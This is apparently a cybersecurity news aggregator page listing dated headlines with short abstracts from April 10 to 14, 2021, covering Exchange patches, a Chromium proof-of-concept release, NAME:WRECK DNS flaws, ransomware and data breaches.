April 14, 2021 – Vulnerabilities
PoC Exploit Released for Unpatched Flaw Affecting Chromium-Based Browsers Full Text
Abstract
A researcher has made public a proof-of-concept (PoC) exploit for a recently discovered vulnerability affecting Chrome, Edge, and other Chromium-based web browsers. The researchers demonstrated the exploit against both Chrome and Microsoft Edge.Security Week
April 13, 2021 – Vulnerabilities
Update Your Chrome Browser to Patch 2 New In-the-Wild 0-Day Exploits Full Text
Abstract
Google on Tuesday released a new version of Chrome web-browsing software for Windows, Mac, and Linux with patches for two newly discovered security vulnerabilities for both of which it says exploits exist in the wild, allowing attackers to engage in active exploitation. One of the two flaws concerns an insufficient validation of untrusted input in its V8 JavaScript rendering engine (CVE-2021-21220), which was demonstrated by Dataflow Security's Bruno Keith and Niklas Baumstark at the Pwn2Own 2021 hacking contest last week. While Google moved to fix the flaw quickly, security researcher Rajvardhan Agarwal published a working exploit over the weekend by reverse-engineering the patch that the Chromium team pushed to the open-source component, a factor that may have played a crucial role in the release. UPDATE: Agarwal, in an email to The Hacker News, confirmed that there's one more vulnerability affecting Chromium-based browsers that has been patched in the latest versThe Hacker News
April 13, 2021 – Vulnerabilities
NSA Discovers New Vulnerabilities Affecting Microsoft Exchange Servers Full Text
Abstract
In its April slate of patches, Microsoft rolled out fixes for a total of 114 security flaws , including an actively exploited zero-day and four remote code execution bugs in Exchange Server. Of the 114 flaws , 19 are rated as Critical, 88 are rated Important, and one is rated Moderate in severity. Chief among them is CVE-2021-28310 , a privilege escalation vulnerability in Win32k that's said to be under active exploitation, allowing attackers to elevate privileges by running malicious code on a target system. Cybersecurity firm Kaspersky, which discovered and reported the flaw to Microsoft in February, linked the zero-day exploit to a threat actor named Bitter APT, which was found exploiting a similar flaw ( CVE-2021-1732 ) in attacks late last year. "It is an escalation of privilege (EoP) exploit that is likely used together with other browser exploits to escape sandboxes or get system privileges for further access," Kaspersky researcher Boris Larin said . NSThe Hacker News
April 13, 2021 – Government
FBI nuked web shells from hacked Exchange Servers without telling owners Full Text
Abstract
A court-approved FBI operation was conducted to remove web shells from compromised US-based Microsoft Exchange servers without first notifying the servers' owners.BleepingComputer
April 13, 2021 – Government
FBI launches operation to remove malware from computers in US Full Text
Abstract
A court in Texas has authorized the FBI to fix malware in hundreds of hacked servers in the U.S. running certain versions of Microsoft Exchange Server software.The Hill
April 13, 2021 – Government
DoJ used court order to thwart ‘hundreds’ of Exchange Server web shells Full Text
Abstract
The move is unprecedented, and implies an understanding that cyber risks should be addressed with the same urgency of other threats to national security and critical infrastructure.SCMagazine
April 13, 2021 – Ransomware
Capcom: Ransomware gang used old VPN device to breach the network Full Text
Abstract
Capcom has released a new update about the ransomware attack it suffered last year, detailing how the hackers gained access to the network, compromised devices, and stole personal information belonging to thousands of individuals.BleepingComputer
April 13, 2021 – Attack
Attacker hacked one Microsoft Exchange server to gain access to others Full Text
Abstract
The tactic is sophisticated, with firewalls unlikely to block traffic between Exchange servers and potentially giving such traffic a pass in terms of content inspection.SCMagazine
April 13, 2021 – General
Hillicon Valley: Microsoft (re)patch requested | International cyber threats growing | New York Times tech workers unionize Full Text
Abstract
Today: Federal agencies urged organizations running a Microsoft email application to immediately patch their systems to prevent hackers from exploiting newly discovered vulnerabilities. Meanwhile, the Office of the Director of National Intelligence released the annual worldwide threats report which highlighted cyber incidents as a key national security threat, and tech workers at the New York Times launched a union.The Hill
April 13, 2021 – Government
CISA gives federal agencies until Friday to patch Exchange servers Full Text
Abstract
The US Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to install newly released Microsoft Exchange security updates by Friday.BleepingComputer
April 13, 2021 – General
Experts see ‘unprecedented’ increase in hackers targeting electric grid Full Text
Abstract
The leader of a key information sharing group said Tuesday that organizations involved in the electricity sector had seen an "unprecedented" increase in cyber threats during the COVID-19 pandemic.The Hill
April 13, 2021 – Vulnerabilities
Microsoft fixes 2 critical Exchange Server flaws reported by the NSA Full Text
Abstract
Microsoft patch Tuesday security updates address four high and critical vulnerabilities in Microsoft Exchange Server that were reported by the NSA. Microsoft patch Tuesday security updates released today have addressed four critical and high severity...Security Affairs
April 13, 2021 – Vulnerabilities
How the NAME:WRECK Bugs Impact Consumers, Businesses Full Text
Abstract
How this class of vulnerabilities will impact millions connected devices and potentially wreck the day of IT security professionals.Threatpost
April 13, 2021 – Government
Federal agencies urge groups to patch systems over new Microsoft vulnerabilities Full Text
Abstract
Federal agencies urged organizations using a Microsoft email application to immediately patch their systems to stop malicious hackers from exploiting newly discovered vulnerabilities.The Hill
April 13, 2021 – Malware
COVID-Related Threats, PowerShell Attacks Lead Malware Surge Full Text
Abstract
Researchers measured 648 new malware threats every minute during Q4 2020.Threatpost
April 13, 2021 – Vulnerabilities
NSA discovers critical Exchange Server vulnerabilities, patch now Full Text
Abstract
Microsoft today has released security updates for Exchange Server that address a set of four vulnerabilities with severity scores ranging from high to critical.BleepingComputer
April 13, 2021 – General
Cyber-bullied Teen Takes Own Life Full Text
Abstract
New York teen kills himself after being bullied and blackmailed onlineInfosecurity Magazine
April 13, 2021 – Business
Cybersecurity Services Market to be Worth $192.7bn Full Text
Abstract
New research suggests global cybersecurity market will be worth $192.7bn by 2028Infosecurity Magazine
April 13, 2021 – Outage
Cyber-Attack Shutters Half of Tasmania’s Casinos Full Text
Abstract
Casino operator Federal Group forced to close venues after ransomware attackInfosecurity Magazine
April 13, 2021 – Phishing
Tax Phish Swims Past Google Workspace Email Security Full Text
Abstract
Crooks are looking to harvest email credentials with a savvy campaign that uses the Typeform service to host the phishing page.Threatpost
April 13, 2021 – Malware
New Linux, macOS malware hidden in fake Browserify NPM package Full Text
Abstract
A new malicious package been spotted this week on the npm registry, which targets NodeJS developers using Linux and Apple macOS operating systems for its recon activities. The malicious package is called "web-browserify." It imitates the popular Browserify npm component, downloaded over 160 million times over its lifetime.BleepingComputer
April 13, 2021 – General
Intel assessment warns of increasing national security threats from China, Russia Full Text
Abstract
An annual worldwide threats assessment made public by the Office of the Director of National Intelligence (ODNI) on Tuesday warned of increasing cyber, technological, and military threats from China and Russia, particularly as the COVID-19 pandemic continues.The Hill
April 13, 2021 – Vulnerabilities
Microsoft closes new critical Exchange vulnerability, suggests patch ‘as soon as possible’ Full Text
Abstract
The alert about new exchange bugs come soon after on-premises Exchange customers were told to patch against a campaign actively exploiting a zero-day vulnerability.SCMagazine
April 13, 2021 – Vulnerabilities
Adobe addresses two critical vulnerabilities in Photoshop Full Text
Abstract
Adobe has addressed security vulnerabilities in Adobe Photoshop, Adobe Digital Editions, Adobe Bridge, and RoboHelp. Adobe has fixed ten security vulnerabilities in Adobe Photoshop, Adobe Digital Editions, Adobe Bridge, and RoboHelp. Seven vulnerabilities...Security Affairs
April 13, 2021 – Vulnerabilities
Microsoft April 2021 Patch Tuesday fixes 108 flaws, 5 zero-days Full Text
Abstract
Today is Microsoft's April 2021 Patch Tuesday, and with it comes five zero-day vulnerabilities and more Critical Microsoft Exchange vulnerabilities. It has been a tough couple of months for Windows and Microsoft Exchange admins, and it looks like April won't be any easier, so please be nice to your IT staff today.BleepingComputer
April 13, 2021 – Vulnerabilities
Adobe Patches Slew of Critical Security Bugs in Bridge, Photoshop Full Text
Abstract
The security bugs could open the door for arbitrary code-execution and full takeover of targeted machines.Threatpost
April 13, 2021 – Business
Fitch Partners with SecurityScorecard to Help Investors Assess Businesses’ Cyber-Risk Full Text
Abstract
The growing threat landscape has made investors more concerned about companies' cybersecurity posturesInfosecurity Magazine
April 13, 2021 – Vulnerabilities
Experts released PoC exploit code for a critical RCE in QNAP NAS devices Full Text
Abstract
The exploit code for a remote code execution vulnerability affecting QNAP network-attached storage (NAS) devices that run the Surveillance Station video management system is available online. An exploit for a remote code execution vulnerability affecting...Security Affairs
April 13, 2021 – Government
Joe Biden Appointed two Former Senior NSA Officials for Senior Cyber Security Roles Full Text
Abstract
Joe Biden, the President of the United States of America, has appointed two senior ex-National Security Agency (NSA) executives for key cyber...Cyber Security News
April 13, 2021 – Malware
QBot malware is back replacing IcedID in malspam campaigns Full Text
Abstract
Malware distributors are rotating payloads once again, switching between trojans that are many times an intermediary stage in a longer infection chain.BleepingComputer
April 13, 2021 – Vulnerabilities
Adobe fixes critical vulnerabilities in Photoshop and Digital Editions Full Text
Abstract
Adobe has released security updates that address security vulnerabilities in Adobe Photoshop, Adobe Digital Editions, Adobe Bridge, and RoboHelp.BleepingComputer
April 13, 2021 – Privacy
Brave browser disables Google’s FLoC tracking system Full Text
Abstract
Brave, a Chromium-based browser, has removed Federated Learning of Cohorts (FLoC), Google's controversial alternative identifier to third-party cookies for tracking users across websites.ZDNet
April 13, 2021 – General
Victims are spotting cyber attacks much more quickly - but there’s a catch Full Text
Abstract
The amount of time cybercriminals are spending inside compromised networks is dropping. But while that might sound like a positive development, one reason hackers are spending less time inside networks is because of the surge in ransomware attacks.ZDNet
April 13, 2021 – Phishing
Watch out for this W-2 phishing scam targeting the 2021 tax season Full Text
Abstract
With the United State tax season in high gear, threat actors have sprung into action with a recent tax document phishing scam that abuses TypeForm forms to steal your login credentials.BleepingComputer
April 13, 2021 – Business
Data of 500 Million LinkedIn Users Scraped and Being Sold Online Full Text
Abstract
LinkedIn is the most recent victim of a massive data breach and data of over 500 million of its users has been...Cyber Security News
April 13, 2021 – Government
US Federal Reserve Chairman Jerome Powell Says Cyberattacks are the Number One Threat to the Global Financial System Full Text
Abstract
Cyberattacks are now the foremost risk to the global financial system, even more so than the lending and liquidity risks that led to the 2008 financial crisis, according to Federal Reserve Chairman Jerome Powell.CNN Money
April 13, 2021 – Vulnerabilities
New NAME:WRECK Vulnerabilities Impact Nearly 100 Million IoT Devices Full Text
Abstract
Security researchers have uncovered nine vulnerabilities affecting four TCP/IP stacks impacting more than 100 million consumer and enterprise devices that could be exploited by an attacker to take control of a vulnerable system. Dubbed " NAME:WRECK " by Forescout and JSOF, the flaws are the latest in series of studies undertaken as part of an initiative called Project Memoria to study the security of widely-used TCP/IP stacks that are incorporated by various vendors in their firmware to offer internet and network connectivity features. "These vulnerabilities relate to Domain Name System (DNS) implementations, causing either Denial of Service (DoS) or Remote Code Execution (RCE), allowing attackers to take target devices offline or to take control over them," the researchers said. The name comes from the fact that parsing of domain names can break (i.e., "wreck") DNS implementations in TCP/IP stacks, adding to a recent uptick in vulnerabilities such asThe Hacker News
April 13, 2021 – Covid-19
McAfee: COVID-19 Themed Attacks Continue to Surge Full Text
Abstract
Overall malware detections reached 648 threats per minute in Q4 2020Infosecurity Magazine
April 13, 2021 – Vulnerabilities
Millions of devices impacted by NAME:WRECK flaws Full Text
Abstract
Security experts disclosed nine flaws, collectively tracked as NAME:WRECK, affecting implementations of the DNS protocol in popular TCP/IP network communication stacks. Security researchers disclosed nine vulnerabilities, collectively tracked as NAME:WRECK,...Security Affairs
April 13, 2021 – Breach
Brokerage Firm Upstox Exposes 2.5 Million Customers Sensitive Information Full Text
Abstract
Upstox suffers a security breach, resulting in the exposure of 2.5 million users' sensitive information online from unsecured AWS S3 Bucket.Cyber Security News
April 13, 2021 – Business
Talon Cyber Security raises $26M to further develop its technology and expand the development team Full Text
Abstract
Talon Cyber Security announced that it has secured $26 million in seed funding from Lightspeed Venture Partners, Team8, serial entrepreneur Zohar Zisapel, and leading cyber angel investors.Help Net Security
April 13, 2021 – Malware
Hackers Using Website’s Contact Forms to Deliver IcedID Malware Full Text
Abstract
Microsoft has warned organizations of a "unique" attack campaign that abuses contact forms published on websites to deliver malicious links to businesses via emails containing fake legal threats, in what's yet another instance of adversaries abusing legitimate infrastructure to mount evasive campaigns that bypass security protections. "The emails instruct recipients to click a link to review supposed evidence behind their allegations, but are instead led to the download of IcedID, an info-stealing malware," the company's threat intelligence team said in a write-up published last Friday. IceID is a Windows-based banking trojan that's used for reconnaissance and exfiltration of banking credentials, alongside features that allow it to connect to a remote command-and-control (C2) server to deploy additional payloads such as ransomware and malware capable of performing hands-on-keyboard attacks, stealing credentials, and moving laterally across affecteThe Hacker News
April 13, 2021 – General
Destructive Attacks Surged in 2020 for Financial Institutions Full Text
Abstract
VMware warns of sophisticated counter incident response effortsInfosecurity Magazine
April 13, 2021 – Vulnerabilities
Expert publicly released Chromium-based browsers exploit demonstrated at Pwn2Own 2021 Full Text
Abstract
An Indian security researcher has published a proof-of-concept (PoC) exploit code for a vulnerability impacting Google Chrome and other Chromium-based browsers. The Indian security researcher Rajvardhan Agarwal has publicly released a proof-of-concept...Security Affairs
April 13, 2021 – General
Network Attack Trends for Winter 2020 Full Text
Abstract
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%).Palo Alto Networks
April 13, 2021 – General
Detecting the “Next” SolarWinds-Style Cyber Attack Full Text
Abstract
The SolarWinds attack , which succeeded by utilizing the sunburst malware , shocked the cyber-security industry. This attack achieved persistence and was able to evade internal systems long enough to gain access to the source code of the victim. Because of the far-reaching SolarWinds deployments, the perpetrators were also able to infiltrate many other organizations, looking for intellectual property and other assets. Among the co-victims: US government, government contractors, Information Technology companies, and NGOs. Terabytes of data of 18,000 customers was stolen after a trojan-ized version of the SolarWinds application was installed in the internal structures of the clients. Looking at the technical capabilities of the malware, as you will see, this particular attack was quite impressive. A particular file, named SolarWinds.Orion.Core.BusinessLayer.dll is a SolarWinds digitally signed component of the Orion software framework. The threat actors installed a backdoor that cThe Hacker News
April 13, 2021 – Vulnerabilities
Name:Wreck Bugs Could Impact 100M IoT Devices Full Text
Abstract
Exploitation could deny service or enable remote code executionInfosecurity Magazine
April 13, 2021 – Outage
Expired certificate caused a Pulse Secure VPN global scale outage Full Text
Abstract
Pulse Secure VPN users were not able to login due to the expiration of a code signing certificate used to digitally sign and verify software components. Pulse Secure VPN users were not able to login after a code signing certificate used to digitally...Security Affairs
April 13, 2021 – Business
Cybersecurity training startup Hack The Box raises $10.6M Series A led by Paladin Capital Full Text
Abstract
Cybersecurity training startup Hack The Box has raised a Series A investment round of $10.6 million, led by Paladin Capital Group and joined by Osage University Partners, Brighteye Ventures, and existing investors Marathon Venture Capital.TechCrunch
April 13, 2021 – Ransomware
Food Shortages at Dutch Supermarkets After Ransomware Outage Full Text
Abstract
Logistics provider Bakker Logistiek suffered attack over EasterInfosecurity Magazine
April 13, 2021 – Phishing
New FormBook Variant Delivered in Phishing Campaign Full Text
Abstract
FortiGuard Labs captured a phishing campaign that was sending a Microsoft PowerPoint document as an email attachment to spread the new variant of the infamous FormBook malware.Fortinet
April 13, 2021 – Vulnerabilities
New DNS vulnerabilities have the potential to impact millions of devices Full Text
Abstract
These vulnerabilities affect four popular TCP/IP stacks – namely FreeBSD, IPnet, Nucleus NET, and NetX – which are commonly present in well-known IT software and popular IoT/OT firmware and have the potential to impact millions of IoT devices.Help Net Security
April 13, 2021 – Vulnerabilities
NAME:WRECK DNS vulnerabilities affect over 100 million devices Full Text
Abstract
Security researchers today disclosed nine vulnerabilities affecting implementations of the Domain Name System protocol in popular TCP/IP network communication stacks running on at least 100 million devices.BleepingComputer
April 13, 2021 – Vulnerabilities
NAME:WRECK DNS bugs affect over 100 million devices Full Text
Abstract
Security researchers today disclosed nine vulnerabilities affecting implementations of the Domain Name System protocol in popular TCP/IP network communication stacks running on at least 100 million devices.BleepingComputer
April 13, 2021 – Vulnerabilities
‘Name:Wreck’ is the latest collision between TCP/IP and the standards process Full Text
Abstract
The set of nine vulnerabilities in four popular TCP/IP stacks, including FreeBSD, show once again how complexities in the TCP/IP standards can ultimately leads to vulnerable products.SCMagazine
April 12, 2021 – Vulnerabilities
Google Chrome, Microsoft Edge zero-day vulnerability shared on Twitter Full Text
Abstract
A security researcher has dropped a zero-day remote code execution vulnerability on Twitter that works on the current version of Google Chrome and Microsoft Edge.BleepingComputer
April 12, 2021 – Policy and Law
Texas Man Charged With Intent of Planning to Kill 70% of the Internet Full Text
Abstract
A Texas man is charged with intent to attack Data Centers on April 8 2021. This man has planned to blow up...Cyber Security News
April 12, 2021 – Ransomware
REvil Breaks Safe Mode Again with Auto-login Feature Full Text
Abstract
Recent research found that REvil ransomware has repurposed its attack technique that involves modifying the user’s system login password and force a system reboot to allow the malware to encrypt the files.Cyware Alerts - Hacker News
April 12, 2021 – General
Hillicon Valley: Biden nominates former NSA deputy director to serve as cyber czar | Apple to send witness to Senate hearing after all | Biden pressed on semiconductor production amid shortage Full Text
Abstract
President BidenJoe BidenFederal Reserve chair: Economy would have been 'so much worse' without COVID-19 relief bills Biden to meet Monday with bipartisan lawmakers about infrastructure Jill Biden gives shout out to Champ, Major on National Pet Day MORE rolled out a list of nominees to fill key cybersecurity positions, which drew support from lawmakers on both sides of the aisle. Meanwhile, top senators on the antitrust subcommittee said Apple will send a witness to hearing later this month on app store competition after they pushed back on what they called the tech giant’s refusal to participate. And as more people in the U.S. get their COVID-19 vaccines, Uber said it recorded its highest monthly gross bookings in company history in March.The Hill
April 12, 2021 – Breach
Indian Brokerage Firm Upstox Suffers Data Breach Leaking 2.5 Millions Users’ Data Full Text
Abstract
Online trading and discount brokerage platform Upstox has become the latest Indian company to suffer a security breach of its systems, resulting in the exposure of sensitive information of approximately 2.5 million users on the dark web. The leaked information includes names, email addresses, dates of birth, bank account information, and about 56 million know your customer (KYC) documents pulled from the company's server. The breach was first disclosed by independent researcher Rajshekhar Rajaharia on April 11. It's not immediately clear when the incident occurred. Reacting to the development, the company, however, said it had recently upgraded its security systems following reports of "unauthorized access into our database" while stressing that users' funds and securities remained protected. As a precaution, besides initiating a secure password reset of users' accounts, Upstox said it restricted access to the impacted database, implying it was a caThe Hacker News
April 12, 2021 – General
UK Sports Teams Boycott Social Media Full Text
Abstract
Sporting stars step back from social media to raise awareness of online abuseInfosecurity Magazine
April 12, 2021 – Government
Two former NSA Officials appointed by Joe Biden for prominent cyber roles Full Text
Abstract
President Joe Biden has appointed two former senior NSA officials for two prominent cyber roles in his administration. President Joe Biden has assigned to two former senior National Security Agency (NSA) officials key cyber roles in his administration. The...Security Affairs
April 12, 2021 – General
61 percent of employees fail basic cybersecurity quiz Full Text
Abstract
Nearly 70% of employees polled in a new survey said they recently received cybersecurity training from their employers, yet 61% nevertheless failed when asked to take a basic quiz on the topic. This was one of the leading findings of a research study – conducted by TalentLMS on behalf of Kenna Security – that sought…SCMagazine
April 12, 2021 – Vulnerabilities
CS:GO, Valve Source games vulnerable to hacking using Steam invites Full Text
Abstract
A group of security researchers known as the Secret Club took it to Twitter to report a remote code execution bug in the Source 3D game engine developed by Valve and used for building games with tens of millions of unique players.BleepingComputer
April 12, 2021 – Phishing
Golden Chickens and New Spear-Phishing Campaign Full Text
Abstract
A new spear-phishing campaign has been targeting LinkedIn users with fake job offers in an attempt to attain control over victims’ computers using a sophisticated backdoor trojan called more_eggs.Cyware Alerts - Hacker News
April 12, 2021 – Government
Lawmakers, industry call on Biden to fund semiconductor production amid shortage Full Text
Abstract
A bipartisan group of more than 70 House and Senate lawmakers on Monday called on President Biden to support funds for semiconductor research and manufacturing as Biden hosted a meeting with technology leaders to discuss a critical shortage in chips.The Hill
April 12, 2021 – Government
Biden Nominates More Ex-NSA Officials to Top Cybersecurity Roles Full Text
Abstract
Two former National Security Agency workers selected by Biden for senior cyber jobsInfosecurity Magazine
April 12, 2021 – Business
Microsoft is open sourcing CyberBattleSim Enterprise Environment Simulator Full Text
Abstract
Microsoft released as open-source the 'CyberBattleSim Python-based toolkit which is an Enterprise Environment Simulator. Microsoft has recently announced the open-source availability of the Python-based enterprise environment simulator. named 'CyberBattleSim.'...Security Affairs
April 12, 2021 – Ransomware
Ransomware’s evolving tools and technical tactics confuse forensic analysis Full Text
Abstract
Adversaries attempt to gain an upper hand by compromising the Active Directory, encrypting VM environments, and abusing Rclone.SCMagazine
April 12, 2021 – Ransomware
Dutch supermarkets run out of cheese after ransomware attack Full Text
Abstract
A ransomware attack against conditioned warehousing and transportation provider Bakker Logistiek has caused a cheese shortage in Dutch supermarkets.BleepingComputer
April 12, 2021 – Ransomware
Close Ties Surface Between Mount Locker and Astro Locker Team Ransomware Groups Full Text
Abstract
Researchers are looking at an uncanny resemblance between ransomware groups Mount Locker and Astro Locker Team. Experts imply a possible tie-up to expedite Mount Locker's onboarding as a RaaS operation.Cyware Alerts - Hacker News
April 12, 2021 – Government
Bipartisan lawmakers signal support for Biden cybersecurity picks Full Text
Abstract
Key lawmakers on Monday expressed support for President Biden’s picks to lead federal efforts on securing the nation against cyber threats.The Hill
April 12, 2021 – Attack
Iran Nuclear Facility Suffers Cyber-Attack Full Text
Abstract
Israeli public media claims Israel was behind a cyber-attack on Iran’s Natanz nuclear complexInfosecurity Magazine
April 12, 2021 – Government
Biden scores praise for nominations of White House, DHS cyber leaders Full Text
Abstract
The announcement ends months of speculation over the key positions, during which time the government has had to face fallout from both the Solarwinds and Hafnium Exchange Server campaigns without leadership in place.SCMagazine
April 12, 2021 – Malware
New Malware Downloader Spotted in Targeted Campaigns Full Text
Abstract
A relatively sophisticated new malware downloader, dubbed as Saint Bot, has surfaced in recent weeks that, though not widespread yet, appears to be gaining momentum. The downloader is being used to drop stealers on compromised systems.Dark Reading
April 12, 2021 – Covid-19
Cyber-criminals Increasingly Leveraging Debates About Travel During #COVID19 to Launch Attacks Full Text
Abstract
A 93% rise in malicious COVID-related domains created using the word 'travel' has been detectedInfosecurity Magazine
April 12, 2021 – Ransomware
How ransomware gangs are connected, sharing resources and tactics Full Text
Abstract
In a whitepaper entitled “Ransom Mafia – Analysis of the World’s First Ransomware Cartel”, DiMaggio and his team aimed to provide an analytical assessment on whether there is indeed a ransomware cartel.Malwarebytes Labs
April 12, 2021 – Business
British cyber security firm Darktrace targets $4 billion London listing Full Text
Abstract
Darktrace, the British cybersecurity firm fired the gun on its $4 billion London listing on Monday, aiming to raise new funds to accelerate product development and strengthen its balance sheet.Reuters
April 12, 2021 – Vulnerabilities
Zerodium Will Triple Payouts for RCE Exploits for WordPress CMS Full Text
Abstract
The exploit purchase platform is currently tempting exploit developers and vendors with a $300,000 payout, three times more than the normal cost. The announcement was made via Twitter.Heimdal Security
April 12, 2021 – Government
Biden makes nominations for top cyber posts Full Text
Abstract
U.S. President Joe Biden is nominating Chris Inglis to be the National Cyber Director and Jen Easterly to be director of the Cybersecurity and Infrastructure Security Agency, the White House said on Monday.Reuters
April 12, 2021 – Outage
Pulse Secure VPN users can’t login due to expired certificate Full Text
Abstract
Users worldwide cannot connect to Pulse Secure VPN devices after a code signing certificate used to digitally sign and verify software components has expired.BleepingComputer
April 12, 2021 – Breach
Hackers Compromised APKPure Android App Store to Deliver Malware Full Text
Abstract
APKPure is a popular third-party Android app store and an alternative to Google's official Play Store was infected with malware this week,...Cyber Security News
April 12, 2021 – Vulnerabilities
UK’s NCSC Issues Critical Alert Against Fortinet VPN Vulnerability Full Text
Abstract
The alert from the NCSC follows a report by Kaspersky detailing how cybercriminals are exploiting a Fortinet VPN vulnerability (CVE-2018-13379) to distribute ransomware by exploiting unpatched systems and remotely accessing usernames and passwords.ZDNet
April 12, 2021 – Government
Biden to nominate former NSA deputy director to serve as cyber czar Full Text
Abstract
President Biden on Monday will roll out a slate of key leaders to head his administration’s approach to cybersecurity, including nominating Chris Inglis, the former deputy director of the National Security Agency (NSA), as the national cyber director at the White House.The Hill
April 12, 2021 – General
What Does It Take To Be a Cybersecurity Researcher? Full Text
Abstract
Behind the strategies and solutions needed to counter today's cyber threats are—dedicated cybersecurity researchers. They spend their lives dissecting code and analyzing incident reports to discover how to stop the bad guys. But what drives these specialists? To understand the motivations for why these cybersecurity pros do what they do, we decided to talk with cybersecurity analysts from around the world. To get viewpoints from across Europe, Asia, and the Americas, we recently spoke with a team of researchers from Acronis' global network of Cyber Protection Operations Centers (CPOCs): Candid Wüest , VP of Cyber Protection Research who is based in Switzerland; Alexander Ivanyuk , Senior Director, Product, and Technology Positioning, who is based in Singapore; and two Cybersecurity Analysts, Topher Tebow and Blake Collins , who are both based in the U.S. The conversation yielded some interesting insights into their views of the world, how they approach cyber threat anThe Hacker News
April 12, 2021 – Criminals
Europol: “Virtually All” Crime Now Has a Digital Element Full Text
Abstract
Criminals are increasingly leveraging digital tech in areas such as communication and financesInfosecurity Magazine
April 12, 2021 – Business
LinkedIn confirmed that it was not a victim of a data breach Full Text
Abstract
LinkedIn has formally denied that the recently disclosed data leak was caused by a security breach, data were obtained via web scraping. LinkedIn has issued a formal statement to deny that the recent leak that exposed the account details of more than...Security Affairs
April 12, 2021 – Criminals
Criminals spread malware using website contact forms with Google URLs Full Text
Abstract
Microsoft is warning businesses to beware of cybercriminals using company website contact forms to deliver the IcedID info-stealing banking trojan in email with Google URLs to employees.ZDNet
April 12, 2021 – Vulnerabilities
Windows, Ubuntu, Zoom, Safari, MS Exchange Hacked at Pwn2Own 2021 Full Text
Abstract
The 2021 spring edition of Pwn2Own hacking contest concluded last week on April 8 with a three-way tie between Team Devcore, OV, and Computest researchers Daan Keuper and Thijs Alkemade. A total of $1.2 million was awarded for 16 high-profile exploits over the course of the three-day virtual event organized by the Zero Day Initiative (ZDI). Targets with successful attempts included Zoom, Apple Safari, Microsoft Exchange, Microsoft Teams, Parallels Desktop, Windows 10, and Ubuntu Desktop operating systems. Some of the major highlights are as follows — Using an authentication bypass and a local privilege escalation to completely take over a Microsoft Exchange server, for which the Devcore team netted $200,000 Chaining a pair of bugs to achieve code execution in Microsoft Teams, earning researcher OV $200,000 A zero-click exploit targeting Zoom that employed a three-bug chain to exploit the messenger app and gain code execution on the target system. ($200,000) The exploitationThe Hacker News
April 12, 2021 – General
Brits Still Confused by Multi-Factor Authentication Full Text
Abstract
FIDO Alliance warns that social media accounts are at riskInfosecurity Magazine
April 12, 2021 – General
Fitch Ratings: Cyberattacks could pose a material risk to water and sewer utilities Full Text
Abstract
Fitch Ratings is warning that cyberattacks could pose a risk to water and sewer utilities potentially impacting their ability to repay debt. Fitch Ratings Inc. is an American credit rating agency and is one of the "Big Three credit rating agencies",...Security Affairs
April 12, 2021 – General
Fitch Ratings: Cyberattacks could pose a material risk to water and sewer utilities Full Text
Abstract
Fitch Ratings published an alert last week to warn of the “material risk” to water and sewer utilities caused by cyber-attacks that could also impact their ability to repay debt.Security Affairs
April 12, 2021 – General
Over 90% of Organizations Hit by a Mobile Malware Attack in 2020 Full Text
Abstract
Check Point warns of MDM threats and chip-based bugsInfosecurity Magazine
April 12, 2021 – Breach
Hackers compromised APKPure client to distribute infected Apps Full Text
Abstract
Multiple security experts discovered threat actors tampered with the APKPure client version 3.17.18 of the popular alternative third-party Android app store. APKPure is available only on devices that use Google Mobile Services (GMS).Security Affairs
April 12, 2021 – Policy and Law
Man Arrested After Failed AWS Bomb Plot Full Text
Abstract
Individual allegedly wanted to “kill off 70% of the internet”Infosecurity Magazine
April 12, 2021 – Government
India seeks US help as China-backed hacks threaten military Full Text
Abstract
India’s top military official says the country plans to seek help from the US and other countries to shore up its defense infrastructure that is vulnerable to China-backed cyber-attacks.The Times Of India
April 11, 2021 – Accident
Is the recent accident at Iran Natanz nuclear plant a cyber attack? Full Text
Abstract
On Sunday, an "accident" occurred in the electricity distribution network at Iran's Natanz nuclear facility, experts speculate it was caused by a cyberattack. A mysterious incident occurred on Sunday at the Natanz nuclear enrichment site and the media...Security Affairs
April 11, 2021 – Privacy
Mozilla flooded with requests after Apple privacy changes hit Facebook Full Text
Abstract
Mozilla volunteers have recently been flooded with requests by online merchants and marketers for their domains to be added to what's called a Public Suffix List (PSL) due to recent privacy changes brought forth by Apple's iOS 14.5.BleepingComputer
April 11, 2021 – Solution
Top 10 Best Free Penetration Testing Tools 2021 Full Text
Abstract
When we talk about the penetration Testing tools, we all know very well that the first thing that comes up to our...Cyber Security News
April 11, 2021 – Breach
Personal data of 1.3 million Clubhouse users leaked online Full Text
Abstract
An SQL database containing the personal data of 1.3 million Clubhouse users was leaked online for free, a few days after LinkedIn and Facebook suffered similar leaks. Researchers from Cyber News have discovered that the personal data of 1.3 million...Security Affairs
April 11, 2021 – General
Security Affairs newsletter Round 309 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. Clop Ransomware operators plunder US universitiesMalware attack on Applus blocked vehicle inspections...Security Affairs
April 11, 2021 – Malware
Joker malware infected 538,000 Huawei Android devices Full Text
Abstract
More than 500,000 Huawei users have been infected with the Joker malware after downloading apps from the company’s official Android store. More than 500,000 Huawei users were infected with the Joker malware after they have downloaded tainted apps...Security Affairs
April 10, 2021 – Malware
Joker malware infects over 500,000 Huawei Android devices Full Text
Abstract
More than 500,000 Huawei users have downloaded from the company's official Android store applications infected with Joker malware that subscribes to premium mobile services.BleepingComputer
April 10, 2021 – Malware
Android malware found on Huawei’s official app store Full Text
Abstract
Researchers say the ten apps posed as legitimate applications, such as virtual keyboards, camera apps, app launchers, instant messengers, sticker collections, coloring programs, and games.The Record
April 10, 2021 – Malware
Android malware found embedded in APKPure store application Full Text
Abstract
Security researchers found malware embedded within the official application of APKPure, a popular third-party Android app store and an alternative to Google's official Play Store.BleepingComputer
April 10, 2021 – Breach
Hackers compromised APKPure client to distribute infected Apps Full Text
Abstract
APKPure, one of the largest alternative app stores, was the victim of a supply chain attack, threat actors compromised client version 3.17.18 to deliver malware. Multiple security experts discovered threat actors tampered with the APKPure client version...Security Affairs
April 10, 2021 – Malware
Crooks abuse website contact forms to deliver IcedID malware Full Text
Abstract
Microsoft researchers spotted a malware campaign abusing contact forms on legitimate websites to deliver the IcedID malware. Security experts from Microsoft have uncovered a malware campaign abusing contact forms on legitimate websites to deliver...Security Affairs
April 10, 2021 – Criminals
This man was planning to kill 70% of Internet in a bomb attack against AWS Full Text
Abstract
